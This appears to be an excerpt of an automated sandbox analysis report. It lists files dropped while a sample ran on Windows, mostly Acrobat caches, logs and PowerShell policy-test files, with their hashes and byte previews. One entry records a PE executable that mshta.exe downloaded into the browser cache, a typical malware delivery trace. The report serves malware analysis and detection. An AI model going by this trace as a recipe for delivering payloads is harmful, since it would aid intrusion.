                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJTqgFCrPeUkwRe9:YvXKXFwY/J0YpW7v8GTq16Ukee9
                                                                                                                  MD5:4B5BD4513A8AB722737A0A4244E7EBEC
                                                                                                                  SHA1:B5711D2A54AFCF34F556CF0DC088B293BDA35BA9
                                                                                                                  SHA-256:7E54F0912EFA928CB40EF5AE590345ED3F7963B04049F33762B072F09B6EC5E3
                                                                                                                  SHA-512:954401843267EAA59F72A5BD88ACCA64F49C45A3A75DCCB45F770B65968AA36344F2D9E67AAF391EC3260F1BD507DD905A8B6B21A35071A40F630C2278BB1384
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:e:e
                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                  Malicious:false
                                                                                                                  Preview:....

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2814
                                                                                                                  Entropy (8bit):5.13129075368379
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:YpvhpHk42getck8Fyi+AiLDSOQZh9CiLf:svhG42gEIFUSO8/CIf
                                                                                                                  MD5:3B5B09355D382FF56035217DC53B6CED
                                                                                                                  SHA1:3CDC3B43B6CEE5197704C17600436EE129A49CAE
                                                                                                                  SHA-256:291F740AD3381DEC21105AC4DAB8AAE3DF88FF97612C26DC468C6B007592CAB4
                                                                                                                  SHA-512:8CFD3085C23CFB9BBDEE695D352EC1A0A8CE42068EE9443C7F813646E51C288B7814D291EF039D7A790F2E6204CA80E10ABE7C2BE1E8366AC7A5870998B359AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"97f81776080734ea82d8f8243e72d0da","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934318000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"eacfda5cc295eaa242a116cb5fe99923","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734934318000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dc8e913d387b93e02e158ada7d674352","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734934318000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"fd01693080e8cd688dc70eb331956564","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734934318000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2bb51335f2218d3c7bbf14049fefb110","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934318000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"e214eaf9bce05d6fa0336b43abd6cc68","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12288
                                                                                                                  Entropy (8bit):0.985752865747936
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpU4zJwtNBwtNbRZ6bRZ4BF:TVl2GL7ms6ggOVp/zutYtp6Pq
                                                                                                                  MD5:88D1D59445F1FF7B8B40B5E0D6559C90
                                                                                                                  SHA1:AA4ACC82893E016C3C3CB618AA0D84707F22AF23
                                                                                                                  SHA-256:1F4375690353D052DCA56C03038DC3E434DAC47C8AD69FB711467996E9B91F6B
                                                                                                                  SHA-512:2B4C75F66024D7FDA4109E680B393FBD755A435351CD2BD47F90EADDA507F44E218663A560138223A42CE74832CF7F11E82C76A0201C05618BF19196CFFF5950
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8720
                                                                                                                  Entropy (8bit):1.3386281642526956
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:7+tjAD1RZKHs/Ds/SpUPzJwtNBwtNbRZ6bRZWf1RZKvqLBx/XYKQvGJF7urs+:7MjGgOVpIzutYtp6PMWqll2GL7ms+
                                                                                                                  MD5:D6E5FB127C31495182BECE4CED45EBF0
                                                                                                                  SHA1:AF05A1997A7668D04F91F26EF37C1F69088EE0F7
                                                                                                                  SHA-256:FB0D6684863A4FDEDE479E46F360D123104EEF3DC62D4E1A1B30B67B3D583371
                                                                                                                  SHA-512:90A0181F7E8ACBA99DB2245C169BF1052CE4B81891E265E03256A978E95A62ACD18AF5524667340D12907538B0D97EC258883598BBD761C4B78B4E7A1B5AD569
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... .c......t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):66726
                                                                                                                  Entropy (8bit):5.392739213842091
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgHpbD+QuT1epmS1VRhYmdq8LYyu:6a6TZ44ADEHpP+Q+1e/ZLK
                                                                                                                  MD5:21098123EA14B0F952FE8E58B21E9612
                                                                                                                  SHA1:95E0D75EF9F177FABDCCB1ED94794378D1B89722
                                                                                                                  SHA-256:2190E4EA706D00E0A4D48C21F83E8EF33FA1FDBCF3639FC8FBFF889AD4E4A359
                                                                                                                  SHA-512:8109E026A2C1BCFD6E3B591E71F18B2618211DE22EA4001FDD3F8243BE92AFC71D0B7FD1A47D83D49E2B30486517C6E54384E4CB9E38585442F2A4CD6A13EBDD
                                                                                                                  Malicious:false
                                                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):441595
                                                                                                                  Entropy (8bit):6.383983943996756
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6UhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj186Lj186Xj186Z
                                                                                                                  MD5:BE648DD9082566580B3484A8D00AE8D9
                                                                                                                  SHA1:31B21C5D4C33AFE52A0998B7F61919150500F245
                                                                                                                  SHA-256:264659EA41F75D41D6739AB9863DBA1BC9CFB435300FB2928741CB1848678B20
                                                                                                                  SHA-512:451FC90CEE63F989802BE269BAEF26838B48596F4ABBBDEB547D83AD90A7528AFACC25DBF94A5C1B29FE4683C44DF9FC1594D44DB4B0EBC1240A5CD555F40467
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11608
                                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\MSI8153f.LOG

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):246
                                                                                                                  Entropy (8bit):3.505069684106714
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAiaw:Qw946cPbiOxDlbYnuRKDl4w
                                                                                                                  MD5:4BBF3C412BE57CC6DA275885E31C0B83
                                                                                                                  SHA1:B7D9A51775B6A660BA6F9E45D98C8BA6B2F3C3DB
                                                                                                                  SHA-256:119550F308C9987B903AAC9646B58B67D6A50CAC5ABE799F91C92415EE622D8F
                                                                                                                  SHA-512:7CA79A51F0EAB9A8D7FC515552A048D75121B644BEE7EA7846B33019C23C532B1A5285B0091B487A1046FC1DAD5A5AB8900DA50B104C46380FB4854247F8E743
                                                                                                                  Malicious:false
                                                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.1.:.1.1.:.5.5. .=.=.=.....

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vql2vxu.xhd.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dsltva2.tfm.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5om35xfj.vi5.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_be3i1o4u.4vz.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg3mimx3.gqt.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdbkaktq.3vc.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5wzdloh.lag.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvjzuj13.5hj.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uookjxzv.cbd.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjhaegkj.lgb.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 01-11-49-536.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16525
                                                                                                                  Entropy (8bit):5.376360055978702
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                  Malicious:false
                                                                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29752
                                                                                                                  Entropy (8bit):5.397141561848925
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbP:7
                                                                                                                  MD5:AF650DC134AEEC0EE5E20D34B37A8F66
                                                                                                                  SHA1:D42C7C42C9A20772BAC0D41D792854C0FD6BF70E
                                                                                                                  SHA-256:CB8661A42705DD5F4BD26B229EFB62974C38AD36DCE8816ABD3E0201BE2EB259
                                                                                                                  SHA-512:D32CD6C1F4EB38595696C2984399F7F920A8D9C235EEC880C4194E2EA3C90A7A25FB2247572E385D778520F39DC92ED7B3E82437AF5F6CE88878AA773D9B056B
                                                                                                                  Malicious:false
